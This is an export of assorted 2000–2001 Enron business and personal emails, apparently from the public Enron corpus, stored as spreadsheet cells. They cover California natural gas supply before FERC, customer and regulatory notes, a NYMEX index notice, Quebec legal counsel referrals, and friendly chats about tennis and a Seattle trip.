_x000D_
_x000D_
"Tracey Bradley" &lt;tbradley@bracepatt.com&gt; on 05/25/2001 08:36:47 AM_x000D_
To: &lt;Jeff.Lam@BCHydro.bc.ca&gt;, "Aryeh Fishman" &lt;afishman@bracepatt.com&gt;, _x000D_
"Andrea Settanni" &lt;asettanni@bracepatt.com&gt;, "Charles Ingebretson" _x000D_
&lt;cingebretson@bracepatt.com&gt;, "Charles Shoneman" &lt;cshoneman@bracepatt.com&gt;, _x000D_
"Deanna King" &lt;dking@bracepatt.com&gt;, "Dan Watkiss" &lt;dwatkiss@bracepatt.com&gt;, _x000D_
"Gene Godley" &lt;ggodley@bracepatt.com&gt;, "Kimberly Curry" _x000D_
&lt;kcurry@bracepatt.com&gt;, "Michael Pate" &lt;mpate@bracepatt.com&gt;, "Marc F. _x000D_
Racicot" &lt;mracicot@bracepatt.com&gt;, "Neil Giles" &lt;ngiles@bracepatt.com&gt;, "Paul _x000D_
Fox" &lt;pfox@bracepatt.com&gt;, "Ronald Carroll" &lt;rcarroll@bracepatt.com&gt;, _x000D_
"Randall Rich" &lt;rrich@bracepatt.com&gt;, "Scott Segal" &lt;ssegal@bracepatt.com&gt;, _x000D_
&lt;agold@coral-energy.com&gt;, &lt;mdpalmer@coral-energy.com&gt;, _x000D_
&lt;rreilley@coral-energy.com&gt;, &lt;ccopat@e-z.net&gt;, &lt;susan.ginsberg@elpaso.com&gt;, _x000D_
&lt;joe.hartsoe@enron.com&gt;, &lt;Rebecca.W.Cantrell@enron.com&gt;, &lt;smara@enron.com&gt;, _x000D_
&lt;bkostiner@exchange.ml.com&gt;, &lt;Jlimone@exchange.ml.com&gt;, _x000D_
&lt;pat.cradock@huskyenergy.ca&gt;, &lt;kmagruder@newpower.com&gt;, _x000D_
&lt;doug.little@powerex.com&gt;, &lt;sheena.macdonald@powerex.com&gt;, _x000D_
&lt;jwade@sidrichgas.com&gt;, &lt;jcardell@tca-us.com&gt;, &lt;tabors@tca-us.com&gt;_x000D_
cc:  _x000D_
Subject: Reuters -- FERC told Calif natgas to reach limit this summer_x000D_
_x000D_
_x000D_
FYI_x000D_
_x000D_
_x000D_
Thursday May 24, 4:11 pm Eastern Time_x000D_
_x000D_
FERC told Calif natgas to reach limit this summer_x000D_
By Julie Vorman_x000D_
_x000D_
WASHINGTON, May 24 (Reuters) - Natural gas supplies will be stretched to the _x000D_
limit this summer in California, but demand will ease during the next four _x000D_
years as utilities become more efficient and hydropower supplies resume, a _x000D_
state regulator told the Federal Energy Regulatory Commission Thursday._x000D_
_x000D_
FERC staff held a technical conference to gather information about _x000D_
California's natural gas demand outlook from state officials, intrastate _x000D_
pipelines, interstate pipelines, marketers and others._x000D_
_x000D_
A spike in wholesale electricity prices in the nation's most populous state _x000D_
has been blamed partly on a bottleneck in natural gas pipelines. Many of _x000D_
California's electricity generation plants are fueled with natural gas._x000D_
_x000D_
Bill Wood, the chief natural gas forecaster for the California Energy _x000D_
Commission, said demand would be about 6.9 billion cubic feet (bcf) per day _x000D_
this year. That compares with 6.7 bcf per day last year and 5.5 bcf in 1995, _x000D_
he said._x000D_
_x000D_
The state's thirst for natural gas will fall slightly in 2002 and remain flat _x000D_
for four years as utilities become more efficient at squeezing electricity _x000D_
out of gas, he said. Hydropower imported from the Pacific Northwest should _x000D_
also return to normal levels after this year's drought and displace some of _x000D_
the gas now being used, Wood told the conference._x000D_
_x000D_
NATGAS STRANDED AT BORDER_x000D_
_x000D_
Forecast demand of 6.9 bcf this year means interstate pipelines bringing _x000D_
natural gas supplies into California will be pushed to their limit._x000D_
_x000D_
The interstate pipelines feeding the state with gas from the Rocky Mountains, _x000D_
New Mexico and other out-of-state fields have a capacity of 7 bcf per day, _x000D_
Wood said._x000D_
_x000D_
But California's intrastate pipelines that pick up the gas can receive a _x000D_
maximum of 6.7 bcf per day, leaving 3 million cubic feet of gas ``stranded at _x000D_
the border,'' he said._x000D_
_x000D_
Wood and other officials said Sempra Energy's (NYSE:SRE - news) Southern _x000D_
California Gas Co, which serves San Diego and the southern portion of the _x000D_
state, had especially tight supplies._x000D_
_x000D_
Lad Lorenz, director of SoCal Gas capacity and operations, told the FERC _x000D_
conference the company had ``adequate'' transmission capacity for its _x000D_
customers. Although the lack of hydropower imports from the Northwest has _x000D_
increased gas demand by 600 million cubic feet per day on SoCal Gas' system, _x000D_
the firm still has enough capacity to handle it, he said._x000D_
_x000D_
``We don't anticipate any problems meeting electricity generation demand this _x000D_
summer,'' Lorenz said. ``We don't project any curtailments.''_x000D_
_x000D_
To help cope with this summer's tightness, SoCal Gas is awaiting state _x000D_
approval of its plan to add capacity of more than 50 million cubic feet per _x000D_
day by salvaging its Montebellow storage field, Lorenz said. It also plans to _x000D_
convert about 14 bcf of ``cushion'' gas -- which is used to maintain adequate _x000D_
pressure in a storage facility -- into working gas._x000D_
_x000D_
The company also has up to 200 million cubic feet per day of interruptible _x000D_
capacity, he said._x000D_
_x000D_
SoCal Gas is spending $55 million on four projects to expand capacity by a _x000D_
total of 475 million cubic feet of firm backbone transmission capacity to its _x000D_
system, he said. The projects should be completed by year-end, if they _x000D_
received quick environmental approvals._x000D_
_x000D_
INTERSTATE PIPELINES HURRY TO EXPAND_x000D_
_x000D_
Interstate pipelines said they were planning ways to get more natural gas to _x000D_
the California border, through upgraded compression equipment and brand-new _x000D_
pipelines._x000D_
_x000D_
El Paso Pipeline is planning to convert the All-America oil pipeline to _x000D_
natural gas, said Patricia Shelton, president of El Paso's western pipeline _x000D_
group._x000D_
_x000D_
That line, which was recently approved by FERC, will ship about 230 million _x000D_
cubic feet per day of natural gas from Texas to the California border by _x000D_
autumn._x000D_
_x000D_
``We're doing this on our dime to loosen up our system,'' Shelton said._x000D_
_x000D_
A major new interstate line, the Sonoran Pipeline, has been proposed in a _x000D_
joint venture by Calpine Corp and Kinder Morgan. The 1,000-mile pipeline _x000D_
would ship 1.5 billion cubic feet of gas each day from Blanco, New Mexico to _x000D_
the San Francisco Bay area._x000D_
_x000D_
The companies are trying to get 20-year contract commitments from customers _x000D_
to determine if the nearly $2 billion pipeline is economically feasible, said _x000D_
Craig Chancellor of Calpine._x000D_
_x000D_
Kern River Gas Transmission, a unit of the Williams Cos (NYSE:WMB - news) , _x000D_
is planning an expansion of its interstate pipeline to add 906 million cubic _x000D_
feet per day of gas. The project, due to be completed by May 2003, will cost _x000D_
more than $1 billion, said Kirk Morgan, director of business development for _x000D_
Kern River Gas Transmission._x000D_
_x000D_
Kern River also plans a temporary expansion of its pipeline to add 135 _x000D_
million cubic feet of capacity. The extra capacity will be available in July _x000D_
through next year, due to air quality restrictions._x000D_
_x000D_
FERC's three commissioners, who are wrestling with other California power _x000D_
issues, did not attend the technical conference._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 00:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Asarco</t>
  </si>
  <si>
    <t>Kim:_x000D_
_x000D_
I spoke to Andrew Gregoricj of Asarco today.  He is an EP Full Requriementst _x000D_
customer.  I used to sell him gas when he was at BHP.  He is the energy _x000D_
manager at Asarco, gas and power.  He buys about 3,500 MMBtu/d.  He is _x000D_
contracted through Sep.  I will be working with him on power.  Please make a _x000D_
note of his information so you can work with him in the future.</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 09:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Eon plans US takeovers</t>
  </si>
  <si>
    <t>Paul - _x000D_
_x000D_
I have been doing some background research on whether we can use _x000D_
administrative proceedings at the FERC, State Commissions, the SEC (Public _x000D_
Utility Holding Company Act) and FTC to raise our issues with regard to _x000D_
E.On's anticompetitive activities in Germany.  As I mentioned earlier, _x000D_
Enron's ability to use US federal and state regulatory proceedings to _x000D_
leverage change in Germany is limited and could backfire on Enron._x000D_
_x000D_
For example, the standard used by the FERC to approve acquisitions of public _x000D_
utilities subject to its jurisdiction is limited in scope and does not allow _x000D_
us to intervene as an interested party simply because we have problems in _x000D_
Germany.  _x000D_
_x000D_
I think the best course of action is to highlight this as a general Germany - _x000D_
US trade issue and get both the USG and the Congress interested.  There may _x000D_
also be some scope for raising this as a political issue in states where E.On _x000D_
is proposing an acquisition (let's hope they try to buy a Texas utility)._x000D_
_x000D_
I have been trading calls with the German expert at USTR and I also have _x000D_
ameeting tomorrow with the Dept. of Commerce where I will have an opportunity _x000D_
to raise this issue. When you are here in august I can schedule other _x000D_
meetings._x000D_
_x000D_
I'll call again tomorrow so we can prepare some background information that _x000D_
will highlight our issues.</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 14:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'charlotte.kraham@enron.com'})</t>
  </si>
  <si>
    <t>Re: Tennis</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Elizabeth._x000D_
_x000D_
Well I'm not sure when we will be able to make up the game.  I was out of _x000D_
town last week and am in St Louis as I write this to you.  I will be here _x000D_
till Friday and then back again on Sunday night until the end of the week.  I _x000D_
saw Dan yesterday during lunch and he reminded me of it too... he knows my _x000D_
situation so I think he will understand if we end up not playing until the _x000D_
new year.  I wish we could play it before then but it doesn't look like my _x000D_
schedule will accomodate it... I am also leaving for NY on the 25th for Xmas _x000D_
with Bryan's family till the 2nd.  _x000D_
_x000D_
Hope all is well with you and your family.  Thanks for getting in contact _x000D_
with me... I am in way over my head not only with snow tonight :) but with _x000D_
work and school.  _x000D_
_x000D_
Are you going out of town for Xmas?  _x000D_
_x000D_
Don't practice too much... I haven't played in weeks so I am back to square _x000D_
one... I think Dan might have to show me what a racket looks like again!!!!!_x000D_
_x000D_
Take care and I will keep you up to date on what's happening with my schedule _x000D_
and when we can get together._x000D_
_x000D_
Char_x000D_
_x000D_
_x000D_
_x000D_
From: Elizabeth Sager@ECT on 12/13/2000 11:05 AM_x000D_
To: Charlotte Kraham/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: Tennis  _x000D_
_x000D_
Hi Charlotte_x000D_
_x000D_
Hope you had a good trip last week.  Work has been horrendous - power and gas _x000D_
prices are decimating my free time - hope EES commercial is not suffering the _x000D_
same onslaught._x000D_
_x000D_
When would be a good time to play (Dan keeps reminding me to finish up the _x000D_
tournament) This week looks bad, but I maybe could play this weekend (less _x000D_
preferable) or Monday, Tuesday (need to get baby-sitting but likely doable) _x000D_
or Wed next week.  Let me know what works for you._x000D_
_x000D_
See ya_x000D_
36349_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Mar 2000 09:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brenda.fletcher@enron.com', 'scott.goodell@enron.com'})</t>
  </si>
  <si>
    <t>cglf k#66394</t>
  </si>
  <si>
    <t>pulled up deal 158501 and added a demand charge for k#66394</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 09:30:32 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lesliewmadams@aol.com'})</t>
  </si>
  <si>
    <t>HABITAT</t>
  </si>
  <si>
    <t>Thank you all for your willingness to serve on our Habitat project.  All of you were chosen for some leadership position because of your skill and experience.   _x000D_
_x000D_
The biggest challenge with this project is the number of people who want to participate.  There is no doubt in my mind that we are going to complete the house, probably ahead of schedule, with this much manpower, so long as Habitat has the supplies on hand.  From our standpoint, the purpose of the project is as much ministry and fellowship as the end product, which is why we didn't turn any volunteers away.   _x000D_
_x000D_
I encourage each of you to participate on as many Saturdays as possible.  We will need some continuity in leadership since so many volunteers will be participating for only one or two Saturdays, and that may be a month apart.  At the same time, there are enough leaders that you shouldn't feel guilty if you have other obligations.  When you are available, you will be instrumental in keeping people organized, safe and productive. _x000D_
_x000D_
Thank you again. _x000D_
_x000D_
Les</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 10:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Hydro Quebec</t>
  </si>
  <si>
    <t xml:space="preserve">Hydro Quebec is not only a provincial utility, it is owned by the Government _x000D_
of Quebec and its business and affairs will be governed by Quebec civil law _x000D_
(all other jurisdictions in Canada are common law jurisdictions) which is _x000D_
generally foreign to non-Quebec lawyers.  Also, unless you are uniquely _x000D_
successful at your negotiations, I expect that HQ will insist on the _x000D_
guarantee being governed by Quebec law.  Accordingly, I agree that Quebec _x000D_
counsel should be involved in looking at the guarantee and isues of _x000D_
authority, capacity, execution, delivery, enforceability, etc.  In fact a _x000D_
legal opinion may be appropriate._x000D_
_x000D_
As to Quebec counsel, I would suggest the following:_x000D_
_x000D_
1.  Andre Vautour @ Desjardins Ducharme Stein Monast in Montreal @ _x000D_
514.878.5595.  Andre acted for us us the Papier Mason transaction and I would _x000D_
recommend him to you._x000D_
2.  Xeno Martis @ Fasken Martineau DuMoulin in Montreal @ 514.397.7509.  Xeno _x000D_
acted for Bank of Nova Scotia on our financing of the Papier Masson _x000D_
transaction and I would also recommend him to you._x000D_
3.  Fred Erickson at Stikeman Elliott in Calgary (who is well known to Mark _x000D_
T) @ 403.266.9016.  Fred is located in Calgary, but he could refer you to _x000D_
someone in his firm's Montreal or Quebec City office.  I personally do not _x000D_
know anyone in particular at either Stikeman's Montreal or Quebec City _x000D_
offices._x000D_
_x000D_
Let me know if I can be of any assistance or how things turn out._x000D_
_x000D_
Regards, Peter._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
MARY COOK_x000D_
08/29/2000 09:10 AM_x000D_
To: Peter Keohane/CAL/ECT@ECT_x000D_
cc: Tana Jones/HOU/ECT@ECT _x000D_
Subject: Hydro Quebec_x000D_
_x000D_
Tana and I will be working on an ISDA for financial derivs with a US trading _x000D_
affiliate of Hydro Quebec (which I understand to be a provincial utility) _x000D_
wherein HQ will be a guarantor.  Because this raises a number of issues we _x000D_
will need Quebec counsel.  Please advise of some good choices.  Thank you.  _x000D_
Mary_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 09:13:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: yes...i live</t>
  </si>
  <si>
    <t>I leave this sunday...so i am just here for a few more days. Gone next week. You can call me after 2pm at work if you want.....713-853-1917.  Otherwise on my cell in the evenings.  I am usually in bed by 10 so I shut my phone off.  Later - mo_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Joseph.F.Reid@accenture.com@ENRON [mailto:IMCEANOTES-Joseph+2EF+2EReid+40accenture+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, June 07, 2001 11:12 AM_x000D_
To:	Sanchez, Monique_x000D_
Subject:	RE: yes...i live_x000D_
_x000D_
_x000D_
I can't believe the amount of travel you fit into your schedule...i am_x000D_
impressed.  I'll try calling you next week before you go._x000D_
_x000D_
joe_x000D_
_x000D_
Joseph F. Reid_x000D_
Accenture_x000D_
617-454-8636 W_x000D_
617-515-7679 C_x000D_
_x000D_
_x000D_
_x000D_
            Monique.Sanchez@enron.c_x000D_
            om                             To:     IMCEANOTES-Joseph+2EF+2EReid+40accenture+2Ecom+40ENRON@enron.com_x000D_
                                           cc:_x000D_
            06/07/2001 11:52 AM            Subject:     RE: yes...i live_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hey there,_x000D_
I am actually off to Alaska on sunday with john and am gone until the_x000D_
20th...so maybe you can call me before then.  Take care,_x000D_
Mo_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   Joseph.F.Reid@accenture.com@ENRON_x000D_
_x000D_
[mailto:IMCEANOTES-Joseph+2EF+2EReid+40accenture+2Ecom+40ENRON@ENRON.com]_x000D_
_x000D_
_x000D_
   Sent:   Thursday, June 07, 2001 10:49 AM_x000D_
   To:     Sanchez, Monique_x000D_
   Subject:  yes...i live_x000D_
_x000D_
   Monique,_x000D_
_x000D_
   Sorry I haven't gotten back to you before now and I truly wish we_x000D_
   could've_x000D_
   gotten together over Memorial Day.  I was only in town a couple of days_x000D_
   and_x000D_
   then off to San Antonio so we just missed each other again.  Go a lot to_x000D_
   catch up on and I am going to be tenacious in my attempts to get a hold_x000D_
   of_x000D_
   you...let me know when you have time to talk.  I am out this weekend but_x000D_
   maybe tonight or next week, we can chat.  Let me know._x000D_
_x000D_
   Take care and stay safe._x000D_
_x000D_
   joe_x000D_
   This message is for the designated recipient only and may contain_x000D_
   privileged or confidential information.  If you have received it in_x000D_
   error,_x000D_
   please notify the sender immediately and delete the original.  Any other_x000D_
   use of the email by you is prohibited._x000D_
_x000D_
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Thu, 20 Sep 2001 15:41:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Crestone Restructure</t>
  </si>
  <si>
    <t xml:space="preserve">Paul, let's try to find some time on Friday to discuss next steps._x000D_
_x000D_
BT _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lucci, Paul T.  _x000D_
Sent:	Wednesday, September 19, 2001 4:22 PM_x000D_
To:	Whitt, Mark; Tycholiz, Barry_x000D_
Subject:	RE: Crestone Restructure_x000D_
_x000D_
Mark and Barry_x000D_
_x000D_
I have talked to Crestone about backing us in a Northern Border transportation deal.  Basically they are on board, however I have not shown them any economics.  What I believe needs to take place is to identify Northern Border shippers who would be willing to release their capacity.  Once we are able to put the capacity release economics together, which will be driven by the Northern Border shippers, we will be able to _x000D_
show Crestone a deal.  I do not have any potential parties willing to release Northern Border capacity.  I have talked to the Central desk about this opportunity, they informed me that they had no interest in this type of an arrangement.  I personally believe we can manage ENA's current Northern Border position more efficiently but have been unable to convince others of this.  Any ideas you can provide would be helpful._x000D_
_x000D_
Paul _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Whitt, Mark  _x000D_
Sent:	Friday, September 14, 2001 7:46 AM_x000D_
To:	Lucci, Paul T._x000D_
Subject:	FW: Crestone Restructure_x000D_
_x000D_
_x000D_
Where are we on the Northern Border deal?_x000D_
 -----Original Message-----_x000D_
From: 	Tycholiz, Barry  _x000D_
Sent:	Friday, September 14, 2001 7:17 AM_x000D_
To:	Whitt, Mark_x000D_
Subject:	Crestone Restructure_x000D_
_x000D_
Mark, Good Morning.  _x000D_
_x000D_
Any updates on Crestone structure ( re-price of deal), also, Paul discussed the Northern Border deal with potentially the producers underpinning... pls keep me posted on status._x000D_
_x000D_
BT </t>
  </si>
  <si>
    <t>Thu, 31 May 2001 06:36:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eddie.zhang@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'tara.piazze@enron.com', 'matt.smith@enron.com'})</t>
  </si>
  <si>
    <t>west pl daily morning report</t>
  </si>
  <si>
    <t>Tara and Matt,_x000D_
_x000D_
_x000D_
Following is list of error message for west pl 5/30/2001 - 5/31/2001 as of this morning --_x000D_
_x000D_
_x000D_
_x000D_
Pipeline Name		Msg_Received_DTM		Msg_Desc			Status_x000D_
----------------------		------------------------------------	--------------------------		-----------------------------------_x000D_
N/A			N/A				N/A				N/A_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Update on Overthrust and Questar --_x000D_
_x000D_
Overthrust web site is still down up to this morning;_x000D_
Questar has not post new data up to this morning._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Eddie</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 09:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'anil.sama@intel.com'})</t>
  </si>
  <si>
    <t>frozenset({'mark_guinney@watsonwyatt.com', 'jeff.dasovich@enron.com', 'cvavrek@dttus.com'})</t>
  </si>
  <si>
    <t>FTC Said Concerned Over Quaker-Pepsi Deal.htm</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;FTC Said Concerned Over Quaker-Pepsi Deal.ZIP&gt;&gt;_x000D_
_x000D_
 - FTC Said Concerned Over Quaker-Pepsi Deal.ZIP</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 06:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>(00-365) Amendment to FTSE Eurotop 300 Index</t>
  </si>
  <si>
    <t xml:space="preserve">Notice No. 00-365_x000D_
October 26, 2000_x000D_
_x000D_
_x000D_
_x000D_
TO:_x000D_
ALL NYMEX/COMEX DIVISION MEMBERS/MEMBER FIRMS_x000D_
ALL NYMEX/COMEX DIVISION CLEARING MEMBERS_x000D_
ALL NYMEX/COMEX DIVISION FLOOR TRADERS_x000D_
ALL NYMEX/COMEX DIVISION OPERATIONS MANAGERS_x000D_
_x000D_
FROM: Neal L. Wolkoff, Executive Vice President_x000D_
_x000D_
SUBJECT: Amendment to the FTSE Eurotop 300c Index due to the acquisition of=_x000D_
=20_x000D_
Content Technologies Holdings Limited by Baltimore Technologies PLC, and th=_x000D_
e=20_x000D_
FTSE Eurotop 300c and FTSE Eurotop 100c Indexes due to the acquisition of=_x000D_
=20_x000D_
Woolwich PLC by Barclays PLC_x000D_
_x000D_
_x000D_
FTSE International is amending the FTSE Eurotop 300c Index due to the=20_x000D_
acquisition of Content Technologies Holdings Limited by Baltimore=20_x000D_
Technologies PLC, and the FTSE Eurotop 300c and FTSE Eurotop 100c Indexes d=_x000D_
ue=20_x000D_
to the acquisition of Woolwich PLC by Barclays PLC. FTSE=01,s technical rel=_x000D_
eases=20_x000D_
at http://newsite.ftse.com/newsinfo/news/A2210_ei.html and=20_x000D_
http://newsite.ftse.com/newsinfo/news/A2213_ei.html describe these amendmen=_x000D_
ts._x000D_
_x000D_
Should you have any questions regarding the above, please contact Jay=20_x000D_
Gottlieb at (212) 299-2607._x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=3Dtana.jones@enron.com&amp;=_x000D_
refdo_x000D_
c=3D(00-365)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Aug 2001 05:38:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: more seattle advice</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Bonnie Lathram" &lt;blathram@LMNArchitects.com&gt;@ENRON [mailto:IMCEANOTES-+22Bonnie+20Lathram+22+20+3Cblathram+40LMNArchitects+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Monday, August 06, 2001 1:32 PM_x000D_
To:	Scott, Susan M._x000D_
Subject:	RE: more seattle advice_x000D_
_x000D_
oh im SOOO glad the weather was good._x000D_
_x000D_
i am not disappointed that you didnt go kayaking- are you kidding? ive_x000D_
been here 6 months and havent done it yet!_x000D_
so glad yall liked the market and "the bite"..._x000D_
_x000D_
i think the seattle market is so neat. some of those people travel 2_x000D_
hours every day to get to seattle to sell their fruits, flowers, etc._x000D_
alot of them are asian immigrants just trying to "make it" in america-_x000D_
all the "stalls" where they sell fish, etc are great small business_x000D_
success stories. that's why i like supporting it..._x000D_
_x000D_
take care_x000D_
_x000D_
bonnie_x000D_
_x000D_
-----Original Message-----_x000D_
From: Susan.M.Scott@enron.com [mailto:Susan.M.Scott@enron.com]_x000D_
Sent: Monday, August 06, 2001 10:44 AM_x000D_
To: Bonnie Lathram_x000D_
Subject: RE: more seattle advice_x000D_
_x000D_
_x000D_
Sorry it took me so long to respond.  It's been really busy here lately._x000D_
You're going to be so disappointed in us, but we never ended up_x000D_
kayaking._x000D_
Monique and I were so glad that you and Luke came to meet us for drinks._x000D_
It was so fun getting to talk to y'all and hear all about Seattle and_x000D_
Vancouver._x000D_
_x000D_
The weather actually turned out to be really good so we spent a lot of_x000D_
time_x000D_
outside.  The Market was fantastic.  We actually bought some boiled_x000D_
shrimp_x000D_
there and took in back to the hotel for a little in room picnic.  We_x000D_
also_x000D_
hit "the Bite" which was really neat._x000D_
_x000D_
Glad you and Luke had a good time in the mountains and please let me_x000D_
know_x000D_
the next time you're in Houston.  It be great to see you again._x000D_
_x000D_
Thanks again for everything,_x000D_
Susan_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   "Bonnie Lathram" &lt;blathram@LMNArchitects.com&gt;@ENRON_x000D_
_x000D_
[mailto:IMCEANOTES-+22Bonnie+20Lathram+22+20+3Cblathram+40LMNArchitects+_x000D_
2Ecom+3E+40ENRON@ENRON.com]_x000D_
_x000D_
_x000D_
   Sent:   Wednesday, July 25, 2001 3:02 PM_x000D_
   To:     Scott, Susan M._x000D_
   Subject:  RE: more seattle advice_x000D_
_x000D_
   Tell me about the rest of your trip/_x000D_
_x000D_
   it was so fun seeing you again and meeting monique. luke and i both_x000D_
had_x000D_
   a really good time_x000D_
_x000D_
   i want to hear all about kayaking, etc as i have not yet tried it in_x000D_
   seattle._x000D_
_x000D_
   hope the weather was nice. we were up in the mountains and it was_x000D_
chilly_x000D_
   and kind of cloudy (but really nice- we saw a black bear and a few_x000D_
   rainbows)- just gorgeous_x000D_
_x000D_
   now back to hot and sunny down in houston, huh???_x000D_
_x000D_
   well i hope yall had fun and it was great seeing yuo_x000D_
_x000D_
   maybe i will see you soon, if i can ever get to going down to houston_x000D_
to_x000D_
   see brad and lisa and my little sister_x000D_
_x000D_
   make sure you tell lisa hello for me_x000D_
_x000D_
   Take care_x000D_
   bonnie_x000D_
_x000D_
   -----Original Message-----_x000D_
   From: Susan.M.Scott@enron.com [mailto:Susan.M.Scott@enron.com]_x000D_
   Sent: Tuesday, July 17, 2001 3:16 PM_x000D_
   To: Bonnie Lathram_x000D_
   Subject: RE: more seattle advice_x000D_
_x000D_
_x000D_
   Thanks Bonnie...we're staying at the Mayflower Inn.  I'll give you a_x000D_
   call_x000D_
   on your cell phone when we get to town.  It may not be until Friday_x000D_
   though_x000D_
   since our plane gets in late...but I'll call none the less._x000D_
_x000D_
   Susan_x000D_
_x000D_
       -----Original Message-----_x000D_
      From:   "Bonnie Lathram" &lt;blathram@LMNArchitects.com&gt;@ENRON_x000D_
_x000D_
_x000D_
[mailto:IMCEANOTES-+22Bonnie+20Lathram+22+20+3Cblathram+40LMNArchitects+_x000D_
   2Ecom+3E+40ENRON@ENRON.com]_x000D_
_x000D_
_x000D_
      Sent:   Tuesday, July 17, 2001 10:30 AM_x000D_
      To:     Scott, Susan M._x000D_
      Subject:  more seattle advice_x000D_
_x000D_
      hey i emailed one of my friends and asked her about kayaking,etc._x000D_
   when_x000D_
      i get a chancce i will look up some internet sights that might_x000D_
have_x000D_
   info_x000D_
      on that sort of thing in seattle. if you have a sec, you may want_x000D_
to_x000D_
   try_x000D_
      seattleinsider.com--- i think they are supposed to be pretty good_x000D_
and_x000D_
      helpful_x000D_
_x000D_
      i havent talked to luke yet, so i dont exactly know my plans for_x000D_
the_x000D_
      weekend unfortunately...._x000D_
_x000D_
      i am thinking that i will head to whistler on early saturday_x000D_
morning,_x000D_
      and that way i can go to dinner with you and your friend on friday_x000D_
      night, or head out and have drinks, or both, or whatever yall want_x000D_
to_x000D_
      do!_x000D_
_x000D_
      the weather is supposed to be great this weekend, but with seattle_x000D_
   you_x000D_
      never know._x000D_
_x000D_
      my MAJOR SUGGESTION is that you bring some sort of light jacket_x000D_
for_x000D_
      sure, or a pullover or something. it gets so darn cold at night-_x000D_
   believe_x000D_
      me you will be glad.  plus on the ferry ride over to san juans it_x000D_
   could_x000D_
      get kind of chilly if you are sitting outside._x000D_
_x000D_
      ive already given you my cell phone number i think (206.851.9177)_x000D_
      definitely call me when you get in town on thursday night or on_x000D_
   friday._x000D_
      the number i have given you is my cell phone and you can call me_x000D_
   anytime_x000D_
      on it. if i dont answer, i check it frequently and you can leave a_x000D_
      message and ill call you back._x000D_
_x000D_
      very exciting to have visitors from texas. see you friday_x000D_
hopefully._x000D_
_x000D_
      oh, where are you staying?_x000D_
      bonnie_x000D_
      -----Original Message-----_x000D_
      From: Scott, Susan M. [mailto:Susan.M.Scott@ENRON.com]_x000D_
      Sent: Monday, July 16, 2001 7:54 AM_x000D_
      To: Bonnie Lathram_x000D_
      Subject: Tour Guide_x000D_
_x000D_
_x000D_
      Hi Bonnie,_x000D_
_x000D_
      How are you doing?  Lisa said you'd broken your foot recently and_x000D_
   have_x000D_
      been stuck on crutches...which I'm guessing is no fun when you're_x000D_
   riding_x000D_
      public transportation.  Anyway, I was writing to see if you might_x000D_
   have_x000D_
      some suggestions of things to do and places to go while in_x000D_
Seattle._x000D_
   One_x000D_
      of my co-workers and myself are flying up Thursday for a long_x000D_
weekend_x000D_
   in_x000D_
      your fair city and were hoping to get a few pointers.  I hope_x000D_
you're_x000D_
      still enjoying things as much as you were a few months ago.  It_x000D_
looks_x000D_
      like you may have changed jobs already, which I trust is a good_x000D_
thing_x000D_
      for you.  I'm very anxious to see the city and all it has to_x000D_
      offer...there is a part of me that has always thought I'd like to_x000D_
   live_x000D_
      in the Pacific Northwest for a while (so this will be a little bit_x000D_
of_x000D_
   a_x000D_
      research trip for me).  If you could start thinking of suggestions_x000D_
   for_x000D_
      restaurants, bars, outdoor activities, etc. that would be great,_x000D_
and_x000D_
      maybe if you're in town we could get together for a meal or a_x000D_
drink._x000D_
_x000D_
      Thanks a bunch,_x000D_
      Susan_x000D_
_x000D_
_x000D_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_x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 01:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Softs structure</t>
  </si>
  <si>
    <t xml:space="preserve">Sara, Janine Juggins is a tax person in our London office.  I am forwarding a _x000D_
chart she sent me, which Trena would like to discuss at our meeting. -- Bob_x000D_
_x000D_
_x000D_
Robert E. Bruce_x000D_
Senior Counsel_x000D_
Enron North America Corp._x000D_
T (713) 345-7780_x000D_
F (713) 646-3393_x000D_
